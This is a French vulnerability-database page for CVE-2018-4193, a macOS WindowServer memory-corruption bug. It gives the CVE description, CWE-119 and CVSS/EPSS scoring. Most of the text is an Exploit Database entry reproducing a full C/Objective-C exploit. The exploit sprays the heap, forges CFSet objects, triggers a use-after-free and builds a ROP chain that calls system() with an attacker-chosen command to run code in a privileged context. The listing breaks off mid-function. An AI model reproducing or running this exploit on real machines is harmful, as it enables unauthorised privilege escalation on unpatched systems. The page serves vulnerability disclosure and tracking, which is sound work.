CVE-2018-4193 : Détail

CVE-2018-4193

7.8
/
Haute
Overflow
18.61%V4
Local
2018-06-08
16h00 +00:00
2019-02-25
09h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

An issue was discovered in certain Apple products. macOS before 10.13.5 is affected. The issue involves the "Windows Server" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V3.0 7.8 HIGH CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

A vulnerability exploitable with Local access means that the vulnerable component is not bound to the network stack, and the attacker's path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file.

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

Required

Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Unchanged

An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

 nvd@nist.gov
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 46428

Date de publication : 2019-02-12 23h00 +00:00
Auteur : Synacktiv
EDB Vérifié : No

#import <Cocoa/Cocoa.h> #import <dlfcn.h> #import <mach-o/dyld.h> #import <mach-o/getsect.h> #import <mach/mach_vm.h> #import <pthread.h> #import "offsets.h" //utils #define ENFORCE(a, label) \ do { \ if (__builtin_expect(!(a), 0)) \ { \ timed_log("[!] %s is false (l.%d)\n", #a, __LINE__); \ goto label; \ } \ } while (0) // from https://stackoverflow.com/questions/4415524/common-array-length-macro-for-c #define COUNT_OF(x) ((sizeof(x)/sizeof(0[x])) / ((size_t)(!(sizeof(x) % sizeof(0[x]))))) #define BYTE(buff, offset) (*(uint8_t *)&((uint8_t *)buff)[offset]) #define DWORD(buff, offset) (*(uint32_t *)&((uint8_t *)buff)[offset]) #define QWORD(buff, offset) (*(uint64_t *)&((uint8_t *)buff)[offset]) // constants used by the exploit #define CFSTRING_SPRAY_SIZE (400*1000*1000) #define CFSTRING_SPRAY_COUNT ((CFSTRING_SPRAY_SIZE)/(3*0x8+sizeof(str_array))) #define CFSET_SPRAY_SIZE (300*1000*1000) // pointers (80*8) + internal size (0x40) #define CFSET_SPRAY_COUNT ((CFSET_SPRAY_SIZE)/(80*8+0x40)) #define VULN_IDX (-0xaaaaab) // 4GB should be enough and it's the maximum we can spray in one OOL #define ROP_SPRAY_SIZE (4*0x400ul*0x400ul*0x400ul - 0x1000) #define SPRAYED_BUFFER_ADDRESS 0x200006000 #define NB_CORE_SWITCH 50 #define NB_HOLES_PER_SWITCH 1000 #define NB_REUSE 200 // private functions (both private and public symbols) static int (* SLSNewConnection)(int, int *); static int (* SLPSRegisterForKeyOnConnection)(int, void *, unsigned int, bool); static mach_port_t (* CGSGetConnectionPortById)(uint32_t); static int (* SLSReleaseConnection)(int); static mach_port_t (* SLSServerPort)(void); // push rbp ; mov rbp, rsp ; mov rax, qword ptr [rdi + 8] ; xor esi, esi ; mov edx, 0x118 ; call qword ptr [rax] #define SAVE_RBP_SET_RAX_GADGET ((uint8_t[]){0x55, 0x48, 0x89, 0xe5, 0x48, 0x8b, 0x47, 0x08, 0x31, 0xf6, 0xba, 0x18, 0x01, 0x00, 0x00, 0xff, 0x10}) // mov rax, qword ptr [rax + 8] ; mov rsi, qword ptr [rax] ; call qword ptr [rsi] #define SET_RSI_GADGET ((uint8_t[]){0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x30, 0xff, 0x16}) // mov rdi, qword ptr [rsi + 0x30] ; mov rax, qword ptr [rsi + 0x38] ; mov rsi, qword ptr [rax] ; call qword ptr [rsi] #define SET_RDI_GADGET ((uint8_t[]){0x48, 0x8b, 0x7e, 0x30, 0x48, 0x8b, 0x46, 0x38, 0x48, 0x8b, 0x30, 0xff, 0x16}) // mov rax, qword ptr [rsi + 0x10] ; mov rsi, qword ptr [rax + 0x20] ; mov rax, qword ptr [rsi - 8] ; mov rax, qword ptr [rax] ; pop rbp ; jmp rax #define POP_RBP_JMP_GADGET ((uint8_t[]){0x48, 0x8b, 0x46, 0x10, 0x48, 0x8b, 0x70, 0x20, 0x48, 0x8b, 0x46, 0xf8, 0x48, 0x8b, 0x00, 0x5d, 0xff, 0xe0}) static int resolve_symbols(); static int build_rop_spray(void **rop_spray, char *command_line); static int massage_heap(int connection_id); static int register_application(int connection_id); static int setup_hooks(int connection_id); static int trigger_the_bug(int connection_id); static int reuse_allocation(int connection_id); static int find_dylib_text_section(const char *dylib_name, void **text_address, size_t *text_size); static void timed_log(char* format, ...); static mach_msg_return_t _CGSSetConnectionProperty(mach_port_t connection_port, int connection_id, const char *key_value, const void *serialized_value, uint32_t serialized_value_length, bool deallocate); static mach_msg_return_t _CGSSetAuxConn(uint32_t connection_id, ProcessSerialNumber *process_serial_number); static mach_msg_return_t _CGSCreateApplication(uint32_t connection_id, ProcessSerialNumber sn, uint32_t session_id, uint32_t session_attributes, uint32_t unknown_2, pid_t pid, char *app_name, char multi_process, uint32_t sent_connection_id); int main(int argc, char **argv) { int connection_id = -1; void *rop_spray = NULL; bool free_application = false; ENFORCE(argc == 2, fail); ENFORCE(strlen(argv[1]) < 0x1000 - 0x600, fail); timed_log("[+] Resolving symbols...\n"); ENFORCE(resolve_symbols() == 0, fail); timed_log("[+] Building our ROP chain...\n"); ENFORCE(build_rop_spray(&rop_spray, argv[1]) == 0, fail); timed_log("[+] Creating a fresh connection...\n"); ENFORCE(SLSNewConnection(0, &connection_id) == 0, fail); timed_log("[+] Setup 'hooks'...\n"); ENFORCE(setup_hooks(connection_id) == 0, fail); timed_log("[+] Making holes (des p'tits trous, des p'tits trous, toujours des p'tit trous : https://www.youtube.com/watch?v=HsX4M-by5OY)...\n"); ENFORCE(massage_heap(connection_id) == 0, fail); // no timed_log, we want to be fast :) ENFORCE(register_application(connection_id) == 0, fail); free_application = true; timed_log("[+] Application registered...\n"); timed_log("[+] Triggering the bug\n"); ENFORCE(trigger_the_bug(connection_id) == 0, fail); timed_log("[+] Let's free and reuse the application...\n"); // this will whack the application free_application = false; ENFORCE(reuse_allocation(connection_id) == 0, fail); timed_log("[+] Trigger the UAF...\n"); ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, "SPRAY", rop_spray, ROP_SPRAY_SIZE, true) == KERN_SUCCESS, fail); // the kernel freed the pages for us :) rop_spray = NULL; // a last synchronised request to make sure our command has been executed... ENFORCE(SLPSRegisterForKeyOnConnection(connection_id, &(ProcessSerialNumber){0, 0}, 8, 1) == -50, fail); // don't leave any connections behind us... ENFORCE(SLSReleaseConnection(connection_id) == 0, fail); connection_id = -1; timed_log("[+] OK\n"); return 0; // fail is the label of choice when coding Apple exploit :) (cf. CVE-2014-1266) fail: if (free_application) { ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x12340000; _CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id); } if (connection_id != -1) SLSReleaseConnection(connection_id); if (rop_spray != NULL) mach_vm_deallocate(mach_task_self(), (mach_vm_address_t)rop_spray, ROP_SPRAY_SIZE); return 1; } static int resolve_symbols() { SLSNewConnection = dlsym(RTLD_DEFAULT, "SLSNewConnection"); ENFORCE(SLSNewConnection != NULL, fail); SLPSRegisterForKeyOnConnection = dlsym(RTLD_DEFAULT, "SLPSRegisterForKeyOnConnection"); ENFORCE(SLPSRegisterForKeyOnConnection != NULL, fail); SLSReleaseConnection = dlsym(RTLD_DEFAULT, "SLSReleaseConnection"); ENFORCE(SLSReleaseConnection != NULL, fail); SLSServerPort = dlsym(RTLD_DEFAULT, "SLSServerPort"); ENFORCE(SLSServerPort != NULL, fail); // ugly but we could find its address by parsing private symbols, we just don't want to waste our time coding it... ENFORCE(((uintptr_t)SLPSRegisterForKeyOnConnection & 0xFFF) == (SLPSRegisterForKeyOnConnection_OFFSET & 0xFFF), fail); CGSGetConnectionPortById = (void *)((uint8_t*)SLPSRegisterForKeyOnConnection - SLPSRegisterForKeyOnConnection_OFFSET + CGSGetConnectionPortById_OFFSET); // paranoid checks, check if function starts with push rbp / mov rbp, rsp ENFORCE(memcmp(CGSGetConnectionPortById, "\x55\x48\x89\xe5", 4) == 0, fail); return 0; fail: return -1; } // the trick is here to map multiple times the same page to make a HUGE alloc that doesn't use a lot of physical memory static int build_rop_spray(void **rop_spray, char *command_line) { void *handle_libswiftCore = NULL; void* large_region = NULL; *rop_spray = NULL; // first we reserve a large region ENFORCE(mach_vm_allocate(mach_task_self(), (mach_vm_address_t *)&large_region, ROP_SPRAY_SIZE, VM_FLAGS_ANYWHERE) == KERN_SUCCESS, fail); // then we allocate the first page void *rop_chain = large_region; ENFORCE(mach_vm_allocate(mach_task_self(), (mach_vm_address_t *)&rop_chain, 0x1000, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE) == KERN_SUCCESS, fail); // now we can construct our rop chain void *release_selector = NSSelectorFromString(@"release"); ENFORCE(release_selector != NULL, fail); // + 0x530 because of our forged CFSet and its 1st hash table entry (=0x200002537) BYTE(rop_chain, 0x530 + 0x20) = 0; // flags DWORD(rop_chain, 0x530 + 0x18) = 0; // mask QWORD(rop_chain, 0x530 + 0x10) = SPRAYED_BUFFER_ADDRESS; // cache address QWORD(rop_chain, 0) = (uint64_t)release_selector; // selector // and now the """fun""" part... handle_libswiftCore = dlopen("/System/Library/PrivateFrameworks/Swift/libswiftCore.dylib", RTLD_GLOBAL | RTLD_NOW); ENFORCE(handle_libswiftCore != NULL, fail); void *libJPEG_text_addr; size_t libJPEG_text_size; ENFORCE(find_dylib_text_section("/System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJPEG.dylib", &libJPEG_text_addr, &libJPEG_text_size) == 0, fail); void *libswiftCore_text_addr; size_t libswiftCore_text_size; ENFORCE(find_dylib_text_section("/System/Library/PrivateFrameworks/Swift/libswiftCore.dylib", &libswiftCore_text_addr, &libswiftCore_text_size) == 0, fail); uintptr_t system_address = (uintptr_t)dlsym(RTLD_DEFAULT, "system"); ENFORCE(system_address != 0, fail); // check our gadgets uintptr_t save_rbp_set_rax = (uintptr_t)memmem(libJPEG_text_addr, libJPEG_text_size, SAVE_RBP_SET_RAX_GADGET, sizeof(SAVE_RBP_SET_RAX_GADGET)); ENFORCE(save_rbp_set_rax != 0, fail); uintptr_t set_rsi = (uintptr_t)memmem(libswiftCore_text_addr, libswiftCore_text_size, SET_RSI_GADGET, sizeof(SET_RSI_GADGET)); ENFORCE(set_rsi != 0, fail); uintptr_t set_rdi = (uintptr_t)memmem(libswiftCore_text_addr, libswiftCore_text_size, SET_RDI_GADGET, sizeof(SET_RDI_GADGET)); ENFORCE(set_rdi != 0, fail); uintptr_t pop_rbp_jmp = (uintptr_t)memmem(libswiftCore_text_addr, libswiftCore_text_size, POP_RBP_JMP_GADGET, sizeof(POP_RBP_JMP_GADGET)); ENFORCE(pop_rbp_jmp != 0, fail); ENFORCE(dlclose(handle_libswiftCore) == 0, fail); handle_libswiftCore = NULL; timed_log("[i] Pivot address: 0x%lX\n", save_rbp_set_rax); QWORD(rop_chain, 8) = save_rbp_set_rax; // pivot // SAVE_RBP_SET_RAX: push rbp ; mov rbp, rsp ; mov rax, qword ptr [rdi + 8] ; xor esi, esi ; mov edx, 0x118 ; call qword ptr [rax] // + 0x137 because of our forged CFSet and its 2nd hash table entry QWORD(rop_chain, 0x137) = set_rsi; // rax=0x200002137 // SET_RSI: mov rax, qword ptr [rax + 8] ; mov rsi, qword ptr [rax] ; call qword ptr [rsi] QWORD(rop_chain, 0x137+8) = SPRAYED_BUFFER_ADDRESS+0x240; // rax=SPRAYED_BUFFER_ADDRESS+0x240 QWORD(rop_chain, 0x240) = SPRAYED_BUFFER_ADDRESS+0x248; // rsi=SPRAYED_BUFFER_ADDRESS+0x248 QWORD(rop_chain, 0x248) = set_rdi; // SET_RDI: mov rdi, qword ptr [rsi + 0x30] ; mov rax, qword ptr [rsi + 0x38] ; mov rsi, qword ptr [rax] ; call qword ptr [rsi] QWORD(rop_chain, 0x248+0x30) = SPRAYED_BUFFER_ADDRESS+0x600; // rdi=SPRAYED_BUFFER_ADDRESS+0x500 QWORD(rop_chain, 0x248+0x38) = SPRAYED_BUFFER_ADDRESS+0x248+0x38+8; // rax=SPRAYED_BUFFER_ADDRESS+0x288 QWORD(rop_chain, 0x288) = SPRAYED_BUFFER_ADDRESS+0x288+8; // rsi=SPRAYED_BUFFER_ADDRESS+0x290 QWORD(rop_chain, 0x290) = pop_rbp_jmp; for (uint32_t i = 0; i < 4; i++) { // POP_RBP_JMP: mov rax, qword ptr [rsi + 0x10] ; mov rsi, qword ptr [rax + 0x20] ; mov rax, qword ptr [rsi - 8] ; mov rax, qword ptr [rax] ; pop rbp ; jmp rax QWORD(rop_chain, i*0x48+0x290+0x10) = SPRAYED_BUFFER_ADDRESS+i*0x48+0x290+0x10+8; // rax=SPRAYED_BUFFER_ADDRESS+0x2A8 QWORD(rop_chain, i*0x48+0x2A8+0x20) = SPRAYED_BUFFER_ADDRESS+i*0x48+0x2A8+0x20+8+8; // rsi=SPRAYED_BUFFER_ADDRESS+0x2D8 QWORD(rop_chain, i*0x48+0x2D8-8) = SPRAYED_BUFFER_ADDRESS+i*0x48+0x2A8+0x20+8+8; // rax=SPRAYED_BUFFER_ADDRESS+0x2D8 QWORD(rop_chain, i*0x48+0x2D8) = i == 3 ? system_address : pop_rbp_jmp; // rax=SPRAYED_BUFFER_ADDRESS+0x2D80x600 } strcpy((char *)&BYTE(rop_chain, 0x600), command_line); QWORD(rop_chain, 0x1000-8) = 0xFFFFFFFF; // make sure that the server won't try to parse this... // and duplicate it, we use two for loops to gain some time for (uintptr_t i = 0x1000ul; i < 4*0x400*0x400; i += 0x1000ul) { mach_vm_address_t remapped_page_address = (mach_vm_address_t)large_region+i; vm_prot_t protection = VM_PROT_READ; kern_return_t kr; kr = mach_vm_remap( mach_task_self(), &remapped_page_address, 0x1000, 0, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, mach_task_self(), (mach_vm_address_t)rop_chain, 0, &protection, &protection, VM_INHERIT_NONE ); ENFORCE(kr == KERN_SUCCESS, fail); ENFORCE(remapped_page_address == (mach_vm_address_t)large_region+i, fail); } for (uintptr_t i = 4*0x400*0x400; i < ROP_SPRAY_SIZE; i += 4*0x400*0x400) { mach_vm_address_t remapped_page_address = (mach_vm_address_t)large_region+i; vm_prot_t protection = VM_PROT_READ; kern_return_t kr; kr = mach_vm_remap( mach_task_self(), &remapped_page_address, 4*0x400*0x400, 0, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, mach_task_self(), (mach_vm_address_t)rop_chain, 0, &protection, &protection, VM_INHERIT_NONE ); ENFORCE(kr == KERN_SUCCESS, fail); ENFORCE(remapped_page_address == (mach_vm_address_t)large_region+i, fail); } *rop_spray = large_region; return 0; fail: if (handle_libswiftCore != NULL) dlclose(handle_libswiftCore); if (large_region != NULL) mach_vm_deallocate(mach_task_self(), (mach_vm_address_t)large_region, ROP_SPRAY_SIZE); return -1; } size_t malloc_size(void *); static int massage_heap(int connection_id) { static UInt8 data_buffer[0x70]; memset(data_buffer, 'A', 0x70); CFDataRef hole_data = NULL; CFNumberRef place_holder_number = NULL; CFDataRef serialized_hole_0x60_data = NULL; CFDataRef serialized_hole_0x70_data = NULL; CFDataRef serialized_number_place_holder = NULL; bool free_tmp_application = false; hole_data = CFDataCreate(NULL, data_buffer, 0x60 - 0x40 - 0x20); ENFORCE(hole_data != NULL, fail); serialized_hole_0x60_data = CFPropertyListCreateData(NULL, hole_data, kCFPropertyListBinaryFormat_v1_0, 0, NULL); ENFORCE(serialized_hole_0x60_data != NULL, fail); CFRelease(hole_data); hole_data = NULL; hole_data = CFDataCreate(NULL, data_buffer, 0x70 - 0x40 - 0x20); ENFORCE(hole_data != NULL, fail); serialized_hole_0x70_data = CFPropertyListCreateData(NULL, hole_data, kCFPropertyListBinaryFormat_v1_0, 0, NULL); ENFORCE(serialized_hole_0x70_data != NULL, fail); CFRelease(hole_data); hole_data = NULL; uint64_t v = 0x1337BAB; place_holder_number = CFNumberCreate(NULL, kCFNumberSInt64Type, &v); ENFORCE(place_holder_number != NULL, fail); serialized_number_place_holder = CFPropertyListCreateData(NULL, place_holder_number, kCFPropertyListBinaryFormat_v1_0, 0, NULL); ENFORCE(serialized_number_place_holder != NULL, fail); CFRelease(place_holder_number); place_holder_number = NULL; // now free the data to make holes :) uint8_t *placeholder_data_bytes = (uint8_t *)CFDataGetBytePtr(serialized_number_place_holder); size_t placeholder_data_size = CFDataGetLength(serialized_number_place_holder); for (uint32_t i = 0; i < NB_CORE_SWITCH; i++) { ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x6660000; // help changing core... ENFORCE(_CGSCreateApplication(connection_id, psn, 0, 0, 2, getpid(), "a", true, connection_id) == KERN_SUCCESS, fail); free_tmp_application = true; for (uint32_t j = 0; j < NB_HOLES_PER_SWITCH; j++) { char key[20]; snprintf(key, sizeof(key), "MSSG_%4d_%4d", i, j); CFDataRef data = j%2 == 0 ? serialized_hole_0x70_data : serialized_hole_0x60_data; uint8_t *data_bytes = (uint8_t *)CFDataGetBytePtr(data); size_t data_size = CFDataGetLength(data); ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, key, data_bytes, data_size, false) == KERN_SUCCESS, fail); snprintf(key, sizeof(key), "MSSH_%4d_%4d", i, j); ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, key, placeholder_data_bytes, placeholder_data_size, false) == KERN_SUCCESS, fail); } ENFORCE(_CGSCreateApplication(connection_id, psn, 1, 0, 2, getpid(), "a", false, connection_id) == -50, fail); free_tmp_application = false; } CFRelease(serialized_number_place_holder); serialized_number_place_holder = NULL; CFRelease(serialized_hole_0x60_data); serialized_hole_0x60_data = NULL; CFRelease(serialized_hole_0x70_data); serialized_hole_0x70_data = NULL; for (uint32_t i = 0; i < NB_CORE_SWITCH; i++) { for (uint32_t j = 0; j < NB_HOLES_PER_SWITCH; j++) { char key[20]; snprintf(key, sizeof(key), "MSSG_%4d_%4d", i, j); ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, key, NULL, 0, false) == KERN_SUCCESS, fail); } } return 0; fail: if (hole_data != NULL) CFRelease(hole_data); if (serialized_hole_0x60_data != NULL) CFRelease(serialized_hole_0x60_data); if (serialized_hole_0x70_data != NULL) CFRelease(serialized_hole_0x70_data); if (place_holder_number != NULL) CFRelease(place_holder_number); if (serialized_number_place_holder != NULL) CFRelease(serialized_number_place_holder); if (free_tmp_application) { ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x6660000; _CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id); } return -1; } static int register_application(int connection_id) { ProcessSerialNumber psn; bool free_application = false; char app_name[0x40]; // app_name must be > 0x20 to not use the tiny holes reserved for CFSet and it must be big enough to fill the rest of the space left by the application memset(app_name, 'B', sizeof(app_name)-1); app_name[COUNT_OF(app_name)-1] = 0; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x12340000; ENFORCE(_CGSCreateApplication(connection_id, psn, 0, 0, 2, getpid(), app_name, true, connection_id) == KERN_SUCCESS, fail); free_application = true; // use a psn in the middle-end of our spray psn.lowLongOfPSN = 0x12340000; ENFORCE(_CGSSetAuxConn(connection_id, &psn) == 0, fail); return 0; fail: if (free_application) { psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x12340000; _CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id); } return -1; } static int setup_hooks(int connection_id) { CFNumberRef set_array_values[35] = {NULL}; CFMutableArrayRef big_array = NULL; CFDataRef data = NULL; timed_log("[+] Forging our set...\n"); uint8_t set_hash_table[71] = { 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0 }; uint32_t set_size = 0; uint64_t v = 0x400000001; while (set_size < COUNT_OF(set_array_values)) { CFNumberRef n; n = CFNumberCreate(NULL, kCFNumberSInt64Type, &v); ENFORCE(n != NULL, fail); uint32_t h = CFHash(n)%71; if (set_hash_table[h] == 1) { set_array_values[set_size] = n; set_hash_table[h] = 0; set_size ++; } else { CFRelease(n); } v++; ENFORCE(v < 0x400000001 + 0xFFFFF, fail); } big_array = CFArrayCreateMutable(NULL, 0, &kCFTypeArrayCallBacks); ENFORCE(big_array != NULL, fail); timed_log("[+] Creating our big set array...\n"); for (uint32_t i = 0; i < CFSET_SPRAY_COUNT; i++) { CFArrayRef tmp_array = CFArrayCreate(NULL, (const void **)set_array_values, COUNT_OF(set_array_values), &kCFTypeArrayCallBacks); ENFORCE(tmp_array != NULL, fail); CFArrayAppendValue(big_array, tmp_array); CFRelease(tmp_array); } for (uint32_t i = 0; i < COUNT_OF(set_array_values); i++) { CFRelease(set_array_values[i]); set_array_values[i] = NULL; } timed_log("[+] Serializing it...\n"); data = CFPropertyListCreateData(NULL, big_array, kCFPropertyListBinaryFormat_v1_0, 0, NULL); ENFORCE(data != NULL, fail); CFRelease(big_array); big_array = NULL; uint8_t *data_bytes = (uint8_t *)CFDataGetBytePtr(data); size_t data_size = CFDataGetLength(data); timed_log("[i] Serialized size: %ldMB\n", data_size / (1000*1000)); timed_log("[+] Patching it...\n"); uint32_t nb_arrays = 0; uint32_t cursor = 0; while (1) { uint8_t *position = memmem(&data_bytes[cursor], data_size-cursor, "\xAF\x10\x23", 3); if (position == NULL) break; position[0] = 0xCF; // Array to Set nb_arrays ++; ENFORCE(nb_arrays <= CFSET_SPRAY_COUNT, fail); cursor = (uint32_t)(position-data_bytes) + 3; } ENFORCE(nb_arrays == CFSET_SPRAY_COUNT, fail); ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, "SPRAY", data_bytes, data_size, false) == KERN_SUCCESS, fail); CFRelease(data); data = NULL; return 0; fail: for (uint32_t i = 0; i < COUNT_OF(set_array_values); i++) if (set_array_values[i] != NULL) CFRelease(set_array_values[i]); if (data != NULL) CFRelease(data); if (big_array != NULL) CFRelease(big_array); return -1; } static int trigger_the_bug(int connection_id) { ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x12340000; int32_t index = VULN_IDX; int err; while ((err = SLPSRegisterForKeyOnConnection(connection_id, &psn, index, 1)) != 0) { // ENFORCE((err == 1011) || (err == -600), fail); ENFORCE(++index < VULN_IDX+((2*8*1024*1024)/0x18), fail); // = 2 small regions = 16 MiB } return 0; fail: return -1; } static int reuse_allocation(int connection_id) { CFNumberRef set_array_values[8] = {NULL}; CFMutableArrayRef big_array = NULL; CFDataRef data = NULL; bool free_tmp_application = false; bool free_application = true; timed_log("[+] Forging our set...\n"); uint8_t set_hash_table[13]; memset(set_hash_table, 1, sizeof(set_hash_table)); uint64_t v; v = 0x2000025; set_array_values[0] = CFNumberCreate(NULL, kCFNumberSInt64Type, &v); // == 0x200002537 -> hash = 0 ENFORCE(CFHash(set_array_values[0])%COUNT_OF(set_hash_table) == 0, fail); set_hash_table[0] = 0; v = 0x2000021; set_array_values[1] = CFNumberCreate(NULL, kCFNumberSInt64Type, &v); // == 0x200002137; -> hash = 1 ENFORCE(CFHash(set_array_values[1])%COUNT_OF(set_hash_table) == 1, fail); set_hash_table[1] = 0; v = 0; uint32_t set_size = 2; while (set_size < COUNT_OF(set_array_values)) { CFNumberRef n; n = CFNumberCreate(NULL, kCFNumberSInt64Type, &v); ENFORCE(n != NULL, fail); uint32_t h = CFHash(n)%COUNT_OF(set_hash_table); if (set_hash_table[h] == 1) { set_array_values[set_size] = n; set_hash_table[h] = 0; set_size ++; } else { CFRelease(n); } v++; ENFORCE(v < 0xFFFFF, fail); } big_array = CFArrayCreateMutable(NULL, 0, &kCFTypeArrayCallBacks); ENFORCE(big_array != NULL, fail); timed_log("[+] Creating our big set array...\n"); for (uint32_t i = 0; i < NB_REUSE; i++) { CFArrayRef tmp_array = CFArrayCreate(NULL, (const void **)set_array_values, COUNT_OF(set_array_values), &kCFTypeArrayCallBacks); ENFORCE(tmp_array != NULL, fail); CFArrayAppendValue(big_array, tmp_array); CFRelease(tmp_array); } for (uint32_t i = 0; i < COUNT_OF(set_array_values); i++) { CFRelease(set_array_values[i]); set_array_values[i] = NULL; } timed_log("[+] Serializing it...\n"); data = CFPropertyListCreateData(NULL, big_array, kCFPropertyListBinaryFormat_v1_0, 0, NULL); ENFORCE(data != NULL, fail); CFRelease(big_array); big_array = NULL; uint8_t *data_bytes = (uint8_t *)CFDataGetBytePtr(data); size_t data_size = CFDataGetLength(data); timed_log("[i] Serialized size: %ldMB\n", data_size / (1000*1000)); timed_log("[+] Patching it...\n"); uint32_t nb_arrays = 0; uint32_t cursor = 0; while (1) { uint8_t *position = memmem(&data_bytes[cursor], data_size-cursor, "\xA8\x02\x03", 3); if (position == NULL) break; position[0] = 0xC8; // Array to Set nb_arrays ++; ENFORCE(nb_arrays <= NB_REUSE, fail); cursor = (uint32_t)(position-data_bytes) + 3; } ENFORCE(nb_arrays == NB_REUSE, fail); ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x12340000; ENFORCE(_CGSCreateApplication(connection_id, psn, 1, 0, 2, getpid(), "a", false, connection_id) == -50, fail); free_application = false; for (uint32_t i = 0; i < 1000; i++) { char key[0x80]; ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x56780000; // help changing core... ENFORCE(_CGSCreateApplication(connection_id, psn, 0, 0, 2, getpid(), "a", true, connection_id) == KERN_SUCCESS, fail); free_tmp_application = true; // we use a long name to make sure it'll not be placed in our holes :) snprintf(key, sizeof(key), 